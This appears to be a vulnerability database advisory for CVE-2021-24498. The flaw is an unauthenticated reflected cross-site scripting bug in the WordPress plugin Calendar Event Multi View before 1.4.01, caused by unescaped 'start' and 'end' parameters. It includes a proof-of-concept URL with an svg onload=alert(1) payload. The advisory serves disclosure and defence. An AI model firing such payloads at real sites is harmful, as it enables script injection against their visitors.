Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitIohexWPEX-ID:3C5A5187-42B3-4F88-9B0E-4FDFA1C39E86
HistoryJul 05, 2021 - 12:00 a.m.

Calendar Event Multi View < 1.4.01 - Unauthenticated Reflected Cross-Site Scripting (XSS)

2021-07-0500:00:00
iohex
212

0.002 Low

EPSS

Percentile

54.3%

JSON

The plugin does not sanitise or escape the ‘start’ and ‘end’ GET parameters before outputting them in the page (via php/edit.php), leading to a reflected Cross-Site Scripting issue.

https://www.example.com/?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22
&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22

Related

cve 1
cvelist 1
nuclei 1
nvd 1
wpvulndb 1
prion 1
cve
cve
CVE-2021-24498
2021-08-02 11:15:11
cvelist
cvelist
CVE-2021-24498 Calendar Event Multi View < 1.4.01 - Unauthenticated Reflected Cross-Site Scripting (XSS)
2021-08-02 10:32:28
nuclei
nuclei
WordPress Calendar Event Multi View <1.4.01 - Cross-Site Scripting
2021-07-19 05:10:50
nvd
nvd
CVE-2021-24498
2021-08-02 11:15:11
wpvulndb
wpvulndb
Calendar Event Multi View < 1.4.01 - Unauthenticated Reflected Cross-Site Scripting (XSS)
2021-07-05 00:00:00
prion
prion
Cross site scripting
2021-08-02 11:15:00

0.002 Low

EPSS

Percentile

54.3%

JSON
Related for WPEX-ID:3C5A5187-42B3-4F88-9B0E-4FDFA1C39E86
cve1cvelist1nuclei1nvd1wpvulndb1prion1